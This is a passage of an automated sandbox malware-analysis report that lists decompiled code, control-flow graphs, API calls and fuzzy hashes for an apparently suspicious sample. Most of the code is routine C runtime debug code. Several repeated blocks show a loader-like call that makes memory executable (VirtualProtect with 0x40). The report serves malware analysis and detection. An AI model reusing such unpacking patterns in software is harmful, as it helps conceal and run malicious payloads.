    0x00b86858
    0x00b8685e
    0x00b86863
    0x00b86868
    0x00b8686c
    0x00b86872
    0x00b86875
    0x00b86880
    0x00b86886
    0x00b868cb
    0x00b868d0
    0x00b868d3
    0x00b868da
    0x00b868e7
    0x00b868ed
    0x00b86902
    0x00b86914
    0x00b8691b
    0x00b86924
    0x00b8692b
    0x00b8693d
    0x00b8694b
    0x00b86951
    0x00b86958
    0x00b8695f
    0x00b86969
    0x00b868ff
    0x00b868ff
    0x00b86975
    0x00b86b73
    0x00b86b73
    0x00b86b85
    0x00b86b9b
    0x00b86ba4
    0x00b86bb5
    0x00b86bbd
    0x00b86bd3
    0x00b86bd8
    0x00b86bbf
    0x00b86bbf
    0x00b86bbf
    0x00b86beb
    0x00b86bf2
    0x00b86c89
    0x00b86c96
    0x00b86c9c
    0x00000000
    0x00b86c02
    0x00b86c0c
    0x00b86c13
    0x00000000
    0x00b86c15
    0x00b86c1b
    0x00b86c29
    0x00b86c49
    0x00b86c58
    0x00b86c58
    0x00b86c2b
    0x00b86c38
    0x00b86c38
    0x00b86c67
    0x00b86c6c
    0x00b86c71
    0x00b86c84
    0x00b86ca2
    0x00000000
    0x00b86c73
    0x00b86c73
    0x00b86c73
    0x00b86c71
    0x00b86c13
    0x00b86ca4
    0x00b86cb3
    0x00b86cb6
    0x00b86b82
    0x00000000
    0x00b86b82
    0x00000000
    0x00b86ba4
    0x00b86cc2
    0x00b86cc8
    0x00b86985
    0x00b8698a
    0x00b86993
    0x00b8699c
    0x00b869a6
    0x00b869b3
    0x00b869a8
    0x00b869ab
    0x00b869ab
    0x00b869c3
    0x00b869c6
    0x00b869d8
    0x00b869f7
    0x00b869fc
    0x00b869ff
    0x00b86a06
    0x00b86a1b
    0x00b86a2a
    0x00b86a3a
    0x00b86a51
    0x00b86a58
    0x00b86a61
    0x00b86a68
    0x00b86a7a
    0x00b86a80
    0x00b86a87
    0x00b86a8e
    0x00b86a98
    0x00b86a37
    0x00b86a37
    0x00b869d5
    0x00000000
    0x00b86a08
    0x00b86a0d
    0x00b86a0d
    0x00000000
    0x00b86a06
    0x00b86aa3
    0x00b86ac7
    0x00b86ad9
    0x00b86b6e
    0x00b86ab2
    0x00b86abb
    0x00b86ac4
    0x00000000
    0x00b86b11
    0x00b86b27
    0x00b86b32
    0x00b86b3c
    0x00b86b4b
    0x00b86b50
    0x00b86b55
    0x00b86b6b
    0x00000000
    0x00b86b57
    0x00b86b57
    0x00b86b57
    0x00b86b55
    0x00000000
    0x00b86ad9
    0x00000000
    0x00b86ac7
    0x00b868dc
    0x00b868dc
    0x00b868dc
    0x00b86cca
    0x00b86ccd
    0x00b86cdb

    APIs
    • GetStartupInfoA.KERNEL32(?), ref: 00B86880
    • GetFileType.KERNEL32(?), ref: 00B86B07
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.638265274.0000000000B71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B70000, based on PE: true
    • Associated: 00000000.00000002.638237207.0000000000B70000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.638841801.0000000000D11000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.638905915.0000000000D16000.00000002.00000001.01000000.00000003.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_b70000_SecuriteInfo.jbxd
    Similarity
    • API ID: FileInfoStartupType
    • String ID: f:\dd\vctools\crt_bld\self_x86\crt\src\ioinit.c
    • API String ID: 3016745765-4097262939
    • Opcode ID: 5917168503a8681453a230386a4b28956dbbf7a168b92dee801114e8bf947700
    • Instruction ID: e5ba21e50207232d490d6339b69d457c3a9e0358696cc11e0f55e306ea773062
    • Opcode Fuzzy Hash: 5917168503a8681453a230386a4b28956dbbf7a168b92dee801114e8bf947700
    • Instruction Fuzzy Hash: 62E1E574E04248CFDB24DFA8C895AADBBB1FB49314F24C29DD465AB3A2C7319846CF50
    Uniqueness

    Uniqueness Score: -1.00%

    Control-flow Graph

    • Executed
    • Not Executed
    control_flow_graph 274 b7e35e-b7e373 275 b7e396-b7e39a 274->275 276 b7e375-b7e393 call b7d760 274->276 278 b7e39c-b7e3c7 call b80c60 call b809f0 275->278 279 b7e3c9-b7e3ee call b7df30 275->279 276->275 284 b7e395 276->284 291 b7e414-b7e417 278->291 283 b7e3f3-b7e3fd 279->283 287 b7e411 283->287 288 b7e3ff-b7e40e call b81bb0 283->288 284->275 287->291 288->287
    C-Code - Quality: 42%
    			E00B7E35E(void* __ebx, void* __ecx, void* __edi, void* __esi) {
    				intOrPtr _t25;
    				intOrPtr _t28;
    				intOrPtr _t29;
    				void* _t34;
    				void* _t35;
    				void* _t36;
    				intOrPtr _t38;
    				void* _t46;
    				void* _t47;
    				void* _t48;
    				void* _t50;
    
    				_t47 = __esi;
    				_t46 = __edi;
    				_t36 = __ecx;
    				_t35 = __ebx;
    				asm("sbb eax, eax");
    				_t25 = 0xffffffe0 /  *(_t48 + 8) + 1;
    				 *((intOrPtr*)(_t48 - 8)) = _t25;
    				if(_t25 == 0) {
    					_push(L"(_HEAP_MAXREQ / nNum) >= nSize");
    					_push(0);
    					_push(0x248);
    					_push(L"f:\\dd\\vctools\\crt_bld\\self_x86\\crt\\src\\dbgheap.c");
    					_push(2);
    					_t34 = L00B7D760();
    					_t50 = _t50 + 0x14;
    					if(_t34 == 1) {
    						asm("int3");
    					}
    				}
    				if( *((intOrPtr*)(_t48 - 8)) != 0) {
    					 *(_t48 + 0xc) =  *(_t48 + 0xc) *  *(_t48 + 8);
    					_t38 =  *0xd1240c; // 0x0
    					_t28 = L00B7DF30(_t38,  *(_t48 + 0xc), _t38,  *((intOrPtr*)(_t48 + 0x10)),  *((intOrPtr*)(_t48 + 0x14)),  *((intOrPtr*)(_t48 + 0x18)),  *((intOrPtr*)(_t48 + 0x1c))); // executed
    					 *((intOrPtr*)(_t48 - 4)) = _t28;
    					if( *((intOrPtr*)(_t48 - 4)) != 0) {
    						E00B81BB0(_t46,  *((intOrPtr*)(_t48 - 4)), 0,  *(_t48 + 0xc));
    					}
    					_t29 =  *((intOrPtr*)(_t48 - 4));
    				} else {
    					 *((intOrPtr*)(L00B80C60(_t36))) = 0xc;
    					E00B809F0(_t35, _t36, _t46, _t47, L"(_HEAP_MAXREQ / nNum) >= nSize", L"_calloc_dbg_impl", L"f:\\dd\\vctools\\crt_bld\\self_x86\\crt\\src\\dbgheap.c", 0x248, 0);
    					_t29 = 0;
    				}
    				return _t29;
    			}














    0x00b7e35e
    0x00b7e35e
    0x00b7e35e
    0x00b7e35e
    0x00b7e36b
    0x00b7e36d
    0x00b7e370
    0x00b7e373
    0x00b7e375
    0x00b7e37a
    0x00b7e37c
    0x00b7e381
    0x00b7e386
    0x00b7e388
    0x00b7e38d
    0x00b7e393
    0x00b7e395
    0x00b7e395
    0x00b7e393
    0x00b7e39a
    0x00b7e3d0
    0x00b7e3e3
    0x00b7e3ee
    0x00b7e3f6
    0x00b7e3fd
    0x00b7e409
    0x00b7e40e
    0x00b7e411
    0x00b7e39c
    0x00b7e3a1
    0x00b7e3bd
    0x00b7e3c5
    0x00b7e3c5
    0x00b7e417

    APIs
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.638265274.0000000000B71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B70000, based on PE: true
    • Associated: 00000000.00000002.638237207.0000000000B70000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.638841801.0000000000D11000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.638905915.0000000000D16000.00000002.00000001.01000000.00000003.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_b70000_SecuriteInfo.jbxd
    Similarity
    • API ID: __invalid_parameter_memset
    • String ID: (_HEAP_MAXREQ / nNum) >= nSize$_calloc_dbg_impl$f:\dd\vctools\crt_bld\self_x86\crt\src\dbgheap.c
    • API String ID: 3961059608-1805389939
    • Opcode ID: 6cf9b863c30615e66bc4c69140084d91fec0b936edded737b666dc52f1cef13d
    • Instruction ID: 800d916cffc80083932d372d4ecc24d021fbef42a085062b51301d6992391a28
    • Opcode Fuzzy Hash: 6cf9b863c30615e66bc4c69140084d91fec0b936edded737b666dc52f1cef13d
    • Instruction Fuzzy Hash: 48114C75A50208BBDB10EF98CC82F9E37E5AF58740F10C5D4F92DAB291E770EA508B60
    Uniqueness

    Uniqueness Score: -1.00%

    Control-flow Graph

    • Executed
    • Not Executed
    control_flow_graph 293 b7a212-b7a213 294 b7a215-b7a21a 293->294 295 b7a264-b7a26e 293->295 296 b7a284-b7a28d 294->296 297 b7a21c-b7a221 294->297 298 b7a290-b7a29b 295->298 299 b7a270-b7a27f call b7c030 295->299 296->298 302 b7a1c5-b7a1c7 297->302 303 b7a223-b7a227 297->303 300 b7a2f2-b7a2fc 298->300 301 b7a29d-b7a2ed SetConsoleCtrlHandler SetConsoleCursorPosition call b7a370 call b7a400 GetCalendarInfoW call b7a3e0 298->301 299->296 308 b7a30d-b7a319 300->308 301->300 309 b7a1e1-b7a1e7 302->309 310 b7a1c9-b7a1d2 302->310 306 b7a25b-b7a262 303->306 307 b7a229-b7a22c 303->307 306->295 307->306 315 b7a32c-b7a34b VirtualProtect 308->315 316 b7a31b-b7a32a call b78800 308->316 313 b7a1eb 309->313 310->309 313->313 316->308
    APIs
    • SetConsoleCtrlHandler.KERNEL32(00000000,00000001), ref: 00B7A2A1
    • SetConsoleCursorPosition.KERNEL32(00000000,?), ref: 00B7A2AD
    • GetCalendarInfoW.KERNEL32(00000000,00000000,00000000,00000000,00000000,005DB76C,director), ref: 00B7A2E1
    • VirtualProtect.KERNELBASE(034A5040,?,00000040,?), ref: 00B7A342
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.638265274.0000000000B71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B70000, based on PE: true
    • Associated: 00000000.00000002.638237207.0000000000B70000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.638841801.0000000000D11000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.638905915.0000000000D16000.00000002.00000001.01000000.00000003.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_b70000_SecuriteInfo.jbxd
    Similarity
    • API ID: Console$CalendarCtrlCursorHandlerInfoPositionProtectVirtual
    • String ID: director
    • API String ID: 477736097-512807920
    • Opcode ID: 072c91af64b9b3190b7149eacedf41efd530bc0c6187de3bd30902bdd099995b
    • Instruction ID: addc62279fb354d77f05e3b996bf2f90d6167ef11d9c9b6ce037492d72090dce
    • Opcode Fuzzy Hash: 072c91af64b9b3190b7149eacedf41efd530bc0c6187de3bd30902bdd099995b
    • Instruction Fuzzy Hash: A6312270A482549FDB91DB60CC80BAE73B5EBD1704F20C1E8E11EAB291DA755D86CB92
    Uniqueness

    Uniqueness Score: -1.00%

    Control-flow Graph

    • Executed
    • Not Executed
    control_flow_graph 324 b7ef43-b7ef47 325 b7ef50-b7ef59 324->325 326 b7ef49 324->326 327 b7ef7c-b7f04d call b81bb0 325->327 328 b7ef5b-b7ef79 call b7d760 325->328 326->325 338 b7f052-b7f059 call b8a9e0 327->338 328->327 333 b7ef7b 328->333 333->327 340 b7f05e-b7f08e 338->340
    APIs
    Strings
    • Q^+, xrefs: 00B7F04C
    • pHead->nBlockUse == nBlockUse, xrefs: 00B7EF5B
    • f:\dd\vctools\crt_bld\self_x86\crt\src\dbgheap.c, xrefs: 00B7EF67
    Memory Dump Source
    • Source File: 00000000.00000002.638265274.0000000000B71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B70000, based on PE: true
    • Associated: 00000000.00000002.638237207.0000000000B70000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.638841801.0000000000D11000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.638905915.0000000000D16000.00000002.00000001.01000000.00000003.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_b70000_SecuriteInfo.jbxd
    Similarity
    • API ID: __free_base
    • String ID: Q^+$f:\dd\vctools\crt_bld\self_x86\crt\src\dbgheap.c$pHead->nBlockUse == nBlockUse
    • API String ID: 3554062276-4181556119
    • Opcode ID: 196a8661f10f423f96af043d4edf6d002738a42a98ae4bea8c557832b2f3145c
    • Instruction ID: a85001fba75d7226c61ad9efbda12ab8415c2687676e88b3be6da775f72812c7
    • Opcode Fuzzy Hash: 196a8661f10f423f96af043d4edf6d002738a42a98ae4bea8c557832b2f3145c
    • Instruction Fuzzy Hash: 1D211A74A00104EFDB04DF54DA91A6977F2EB88304F30C1D8E4295B396D736EE02DB90
    Uniqueness

    Uniqueness Score: -1.00%

    Control-flow Graph

    APIs
    • SetConsoleCtrlHandler.KERNEL32(00000000,00000001), ref: 00B7A2A1
    • SetConsoleCursorPosition.KERNEL32(00000000,?), ref: 00B7A2AD
    • GetCalendarInfoW.KERNEL32(00000000,00000000,00000000,00000000,00000000,005DB76C,director), ref: 00B7A2E1
    • VirtualProtect.KERNELBASE(034A5040,?,00000040,?), ref: 00B7A342
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.638265274.0000000000B71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B70000, based on PE: true
    • Associated: 00000000.00000002.638237207.0000000000B70000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.638841801.0000000000D11000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.638905915.0000000000D16000.00000002.00000001.01000000.00000003.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_b70000_SecuriteInfo.jbxd
    Similarity
    • API ID: Console$CalendarCtrlCursorHandlerInfoPositionProtectVirtual
    • String ID: director
    • API String ID: 477736097-512807920
    • Opcode ID: 7a5c5d7f55cd021a349b5ac00e0bf3c17d04ef891fa1c8f983ea09a448af4ff2
    • Instruction ID: 400cc8756e3fbb513b64f0500b524704b10b126db409b460ac768076440b8127
    • Opcode Fuzzy Hash: 7a5c5d7f55cd021a349b5ac00e0bf3c17d04ef891fa1c8f983ea09a448af4ff2
    • Instruction Fuzzy Hash: 6E11BB70A44254EADB90DBA0DC55BAE77B1AF84300F10C1D8E10EAB291DEB05EC1CF66
    Uniqueness

    Uniqueness Score: -1.00%

    Control-flow Graph

    APIs
    • SetConsoleCtrlHandler.KERNEL32(00000000,00000001), ref: 00B7A2A1
    • SetConsoleCursorPosition.KERNEL32(00000000,?), ref: 00B7A2AD
    • GetCalendarInfoW.KERNEL32(00000000,00000000,00000000,00000000,00000000,005DB76C,director), ref: 00B7A2E1
    • VirtualProtect.KERNELBASE(034A5040,?,00000040,?), ref: 00B7A342
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.638265274.0000000000B71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B70000, based on PE: true
    • Associated: 00000000.00000002.638237207.0000000000B70000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.638841801.0000000000D11000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.638905915.0000000000D16000.00000002.00000001.01000000.00000003.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_b70000_SecuriteInfo.jbxd
    Similarity
    • API ID: Console$CalendarCtrlCursorHandlerInfoPositionProtectVirtual
    • String ID: director
    • API String ID: 477736097-512807920
    • Opcode ID: c505ab824353a448fc578355181d1876c92470ce768e030daab769812a9f554f
    • Instruction ID: 9917db28652560435ce8c3f5f99c52214915f20df45f6db2fd0e9b933816abd1
    • Opcode Fuzzy Hash: c505ab824353a448fc578355181d1876c92470ce768e030daab769812a9f554f
    • Instruction Fuzzy Hash: 9A115E70A44244EBDB90DB90DC85BEE73B1EB94300F10C5D8E11E6A290DF716EC58F66
    Uniqueness

    Uniqueness Score: -1.00%

    Control-flow Graph

    • Executed
    • Not Executed
    control_flow_graph 384 b7efbe-b7efdc call b7d760 387 b7efdf-b7f04d call b81bb0 384->387 388 b7efde 384->388 393 b7f052-b7f059 call b8a9e0 387->393 388->387 395 b7f05e-b7f08e 393->395
    APIs
    Strings
    • Q^+, xrefs: 00B7F04C
    • _pLastBlock == pHead, xrefs: 00B7EFBE
    • f:\dd\vctools\crt_bld\self_x86\crt\src\dbgheap.c, xrefs: 00B7EFCA
    Memory Dump Source
    • Source File: 00000000.00000002.638265274.0000000000B71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B70000, based on PE: true
    • Associated: 00000000.00000002.638237207.0000000000B70000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.638841801.0000000000D11000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.638905915.0000000000D16000.00000002.00000001.01000000.00000003.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_b70000_SecuriteInfo.jbxd
    Similarity
    • API ID: __free_base
    • String ID: Q^+$_pLastBlock == pHead$f:\dd\vctools\crt_bld\self_x86\crt\src\dbgheap.c
    • API String ID: 3554062276-3700702137
    • Opcode ID: f93932581a0e948092927053fc6e6223262383fdd530519c5f143f32c0b5e19c
    • Instruction ID: 95f993d85dca6766257e4ade1dd77946b2937a374000b48bd92b114df2819b27
    • Opcode Fuzzy Hash: f93932581a0e948092927053fc6e6223262383fdd530519c5f143f32c0b5e19c
    • Instruction Fuzzy Hash: 4201A2B8A40204EFC704DF54C992E6AB3F5AF88304F30C2D8E4196B392D672DE12DB95
    Uniqueness

    Uniqueness Score: -1.00%

    Control-flow Graph

    • Executed
    • Not Executed
    control_flow_graph 397 b7df4f-b7df59 398 b7df60-b7df64 397->398 399 b7df5b-b7df5e 397->399 401 b7df66-b7df72 398->401 402 b7df74-b7df82 call b856b0 398->402 400 b7df93-b7df96 399->400 401->400 405 b7df84-b7df8f 402->405 406 b7df91 402->406 405->400 407 b7df36-b7df4a call b7dfa0 406->407 407->397
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.638265274.0000000000B71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B70000, based on PE: true
    • Associated: 00000000.00000002.638237207.0000000000B70000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.638841801.0000000000D11000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.638905915.0000000000D16000.00000002.00000001.01000000.00000003.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_b70000_SecuriteInfo.jbxd
    Similarity
    • API ID:
    • String ID: QQ
    • API String ID: 0-3460843698
    • Opcode ID: 33f2cae150e95fa3361ddba28a687a13b41f8b9f4b9873758d3276bb0d706557
    • Instruction ID: 6d3cc5509c636f565618a426ae45a38b991662830d205295ad0204a5815b612e
    • Opcode Fuzzy Hash: 33f2cae150e95fa3361ddba28a687a13b41f8b9f4b9873758d3276bb0d706557
    • Instruction Fuzzy Hash: B80119B1A04109EFDB14DF94D880BAA73F4EF48384F10C5A8F82A9B240E334EA51DB51
    Uniqueness

    Uniqueness Score: -1.00%

    Control-flow Graph

    • Executed
    • Not Executed
    control_flow_graph 409 b7f024-b7f02a 410 b7f02d-b7f059 call b81bb0 call b8a9e0 409->410 411 b7f02c 409->411 416 b7f05e-b7f08e 410->416 411->410
    APIs
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.638265274.0000000000B71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B70000, based on PE: true
    • Associated: 00000000.00000002.638237207.0000000000B70000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.638841801.0000000000D11000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.638905915.0000000000D16000.00000002.00000001.01000000.00000003.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_b70000_SecuriteInfo.jbxd
    Similarity
    • API ID: __free_base
    • String ID: Q^+
    • API String ID: 3554062276-3699871978
    • Opcode ID: 681f9f87846d720a00e0732b62ba1038610e7fb3f9ad31e6be09751d5ef92dd6
    • Instruction ID: 9623e6058d3eefa1758ccc21cf01694e915a69d066cc725b08b7723b8e14a285
    • Opcode Fuzzy Hash: 681f9f87846d720a00e0732b62ba1038610e7fb3f9ad31e6be09751d5ef92dd6
    • Instruction Fuzzy Hash: 5DE09BF9D01104AFCB14DF58D98187A73F5EB88304B3085D9E51993316E536DF129761
    Uniqueness

    Uniqueness Score: -1.00%

    Control-flow Graph

    • Executed
    • Not Executed
    control_flow_graph 418 b849a0-b849a7 call b848d0 420 b849ac-b849b0 418->420
    APIs
    • __encode_pointer.LIBCMTD ref: 00B849A7
      • Part of subcall function 00B848D0: TlsGetValue.KERNEL32(00000001), ref: 00B848E5
      • Part of subcall function 00B848D0: TlsGetValue.KERNEL32(00000001,00000001), ref: 00B84906
      • Part of subcall function 00B848D0: __crt_wait_module_handle.LIBCMTD ref: 00B8491C
      • Part of subcall function 00B848D0: GetProcAddress.KERNEL32(00000000,EncodePointer), ref: 00B84936
      • Part of subcall function 00B848D0: RtlEncodePointer.NTDLL(?), ref: 00B84957
    Memory Dump Source
    • Source File: 00000000.00000002.638265274.0000000000B71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B70000, based on PE: true
    • Associated: 00000000.00000002.638237207.0000000000B70000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.638841801.0000000000D11000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.638905915.0000000000D16000.00000002.00000001.01000000.00000003.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_b70000_SecuriteInfo.jbxd
    Similarity
    • API ID: Value$AddressEncodePointerProc__crt_wait_module_handle__encode_pointer
    • String ID:
    • API String ID: 568403282-0
    • Opcode ID: fb21a690cbc528bcb0d607fcdff0d54d80aaf3bd438bde93a8f32b3e250f0c57
    • Instruction ID: 9068fd2dd90ccdce2fd1112ecaf1a0f98e392a75b4730829210c9982014a752e
    • Opcode Fuzzy Hash: fb21a690cbc528bcb0d607fcdff0d54d80aaf3bd438bde93a8f32b3e250f0c57
    • Instruction Fuzzy Hash: FFA011A288828823E00030823803B023A8C83C2A38F0800A0FA0C0A2823882A82082A3
    Uniqueness

    Uniqueness Score: -1.00%

    Control-flow Graph

    • Executed
    • Not Executed
    control_flow_graph 421 b7cdb0-b7cdb5 call b85780 423 b7cdba call b7cdd0 421->423
    APIs
    • ___security_init_cookie.LIBCMTD ref: 00B7CDB5
    Memory Dump Source
    • Source File: 00000000.00000002.638265274.0000000000B71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B70000, based on PE: true
    • Associated: 00000000.00000002.638237207.0000000000B70000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.638841801.0000000000D11000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.638905915.0000000000D16000.00000002.00000001.01000000.00000003.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_b70000_SecuriteInfo.jbxd
    Similarity
    • API ID: ___security_init_cookie
    • String ID:
    • API String ID: 3657697845-0
    • Opcode ID: 76df5c532af78bfc8464b4ec5d3c1172889fb28391e61f316a0f905763e3947d
    • Instruction ID: dd355b5fb85c85821e9eb023835ae7f688db3e8323d433d081dcd604dd57e304
    • Opcode Fuzzy Hash: 76df5c532af78bfc8464b4ec5d3c1172889fb28391e61f316a0f905763e3947d
    • Instruction Fuzzy Hash: 8FA00225544A485A417133E6040794A7DCD89C0710FD580B9B52C021131C54BC0191AA
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 92%
    			E00B88F12() {
    				struct _OVERLAPPED* _t166;
    				WCHAR* _t170;
    				signed int _t181;
    				long _t184;
    				intOrPtr _t190;
    				signed int _t195;
    				void* _t200;
    				void* _t203;
    				void* _t207;
    				struct _OVERLAPPED* _t215;
    				struct _OVERLAPPED** _t216;
    				intOrPtr _t233;
    				void* _t243;
    				void* _t244;
    				void* _t245;
    				signed int _t267;
    				signed int _t269;
    				void* _t303;
    				void* _t304;
    				void* _t305;
    				void* _t306;
    				signed int _t307;
    				void* _t309;
    				void* _t311;
    				void* _t313;
    				void* _t315;
    
    				if(InterlockedIncrement(0xd11d48) <= 0) {
    					if( *((intOrPtr*)(_t307 + 0x18)) != 0) {
    						 *(_t307 - 0x7038) =  *(L00B80C60(_t245));
    						 *(L00B80C60(_t245)) = 0;
    						_t282 =  *((intOrPtr*)(_t307 + 0x1c));
    						_t233 = E00B93940(_t307 - 0x7030, 0x1000, 0xfeb,  *((intOrPtr*)(_t307 + 0x18)),  *((intOrPtr*)(_t307 + 0x1c)));
    						_t309 = _t309 + 0x14;
    						 *((intOrPtr*)(_t307 - 0x7034)) = _t233;
    						if( *((intOrPtr*)(_t307 - 0x7034)) < 0) {
    							E00B7DC00( *(L00B80C60(_t282)), 0x16, 0x22, L"(*_errno())", L"_VCrtDbgReportW", L"f:\\dd\\vctools\\crt_bld\\self_x86\\crt\\src\\dbgrptt.c", 0x206, 0);
    							_t309 = _t309 + 0x20;
    						}
    						 *(L00B80C60(_t282)) =  *(_t307 - 0x7038);
    						if( *((intOrPtr*)(_t307 - 0x7034)) < 0) {
    							E00B7DBD0(E00B899D0(_t243, _t282, _t303, _t305, _t307 - 0x7030, 0x1000, L"_CrtDbgReport: String too long or IO Error"), _t236, L"wcscpy_s(szUserMessage, 4096, L\"_CrtDbgReport: String too long or IO Error\")", L"_VCrtDbgReportW", L"f:\\dd\\vctools\\crt_bld\\self_x86\\crt\\src\\dbgrptt.c", 0x209, 0);
    							_t309 = _t309 + 0x24;
    						}
    					}
    					if( *(_t307 + 8) == 2) {
    						if( *((intOrPtr*)(_t307 + 0x18)) == 0) {
    							 *((intOrPtr*)(_t307 - 0x8070)) = L"Assertion failed!";
    						} else {
    							 *((intOrPtr*)(_t307 - 0x8070)) = L"Assertion failed: ";
    						}
    						E00B7DBD0(E00B899D0(_t243,  *((intOrPtr*)(_t307 - 0x8070)), _t303, _t305, _t307 - 0x5030, 0x1000,  *((intOrPtr*)(_t307 - 0x8070))), _t227, L"wcscpy_s(szLineMessage, 4096, szFormat ? L\"Assertion failed: \" : L\"Assertion failed!\")", L"_VCrtDbgReportW", L"f:\\dd\\vctools\\crt_bld\\self_x86\\crt\\src\\dbgrptt.c", 0x20e, 0);
    						_t309 = _t309 + 0x24;
    					}
    					_t246 = _t307 - 0x5030;
    					E00B7DBD0(E00B92F70(_t243, _t307 - 0x5030, _t303, _t305, _t307 - 0x5030, 0x1000, _t307 - 0x7030), _t159, L"wcscat_s(szLineMessage, 4096, szUserMessage)", L"_VCrtDbgReportW", L"f:\\dd\\vctools\\crt_bld\\self_x86\\crt\\src\\dbgrptt.c", 0x210, 0);
    					_t311 = _t309 + 0x24;
    					if( *(_t307 + 8) == 2) {
    						if(( *(0xd11d4c +  *(_t307 + 8) * 4) & 0x00000001) != 0) {
    							_t246 = _t307 - 0x5030;
    							E00B7DBD0(E00B92F70(_t243, _t307 - 0x5030, _t303, _t305, _t307 - 0x5030, 0x1000, "\r"), _t225, L"wcscat_s(szLineMessage, 4096, L\"\\r\")", L"_VCrtDbgReportW", L"f:\\dd\\vctools\\crt_bld\\self_x86\\crt\\src\\dbgrptt.c", 0x215, 0);
    							_t311 = _t311 + 0x24;
    						}
    						E00B7DBD0(E00B92F70(_t243, _t246, _t303, _t305, _t307 - 0x5030, 0x1000, "\n"), _t223, L"wcscat_s(szLineMessage, 4096, L\"\\n\")", L"_VCrtDbgReportW", L"f:\\dd\\vctools\\crt_bld\\self_x86\\crt\\src\\dbgrptt.c", 0x217, 0);
    						_t311 = _t311 + 0x24;
    					}
    					if( *(_t307 + 0xc) == 0) {
    						E00B7DBD0(E00B899D0(_t243, _t307 - 0x3028, _t303, _t305, _t307 - 0x3028, 0x1000, _t307 - 0x5030), _t162, L"wcscpy_s(szOutMessage, 4096, szLineMessage)", L"_VCrtDbgReportW", L"f:\\dd\\vctools\\crt_bld\\self_x86\\crt\\src\\dbgrptt.c", 0x225, 0);
    						_t313 = _t311 + 0x24;
    					} else {
    						 *(_t307 - 0x703c) = 0;
    						 *(_t307 - 0x7040) =  *(L00B80C60(_t246));
    						 *(L00B80C60(_t246)) = 0;
    						_push(_t307 - 0x5030);
    						_push( *(_t307 + 0x10));
    						_t279 = _t307 - 0x3028;
    						_t215 = E00B89970(_t307 - 0x3028, _t307 - 0x3028, 0x1000, 0x1000, L"%s(%d) : %s",  *(_t307 + 0xc));
    						_t313 = _t311 + 0x1c;
    						 *(_t307 - 0x703c) = _t215;
    						if( *(_t307 - 0x703c) < 0) {
    							E00B7DC00( *((intOrPtr*)(L00B80C60(_t279))), 0x16, 0x22, L"(*_errno())", L"_VCrtDbgReportW", L"f:\\dd\\vctools\\crt_bld\\self_x86\\crt\\src\\dbgrptt.c", 0x21f, 0);
    							_t313 = _t313 + 0x20;
    						}
    						_t216 = L00B80C60(_t279);
    						_t280 =  *(_t307 - 0x7040);
    						 *_t216 =  *(_t307 - 0x7040);
    						if( *(_t307 - 0x703c) < 0) {
